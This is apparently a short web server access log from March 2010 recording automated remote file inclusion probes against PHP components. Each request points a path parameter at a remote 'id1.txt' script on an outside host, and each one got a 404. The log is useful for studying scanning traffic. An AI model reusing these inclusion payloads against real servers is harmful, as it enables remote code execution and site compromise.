200.93.147.154 - - [07/Mar/2010:04:22:37 -0800] "GET /logs/access_100220.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:22:46 -0800] "GET /logs/components/com_securityimages/lang.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:22:46 -0800] "GET /logs/access_100208.log/components/com_securityimages/lang.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:22:47 -0800] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
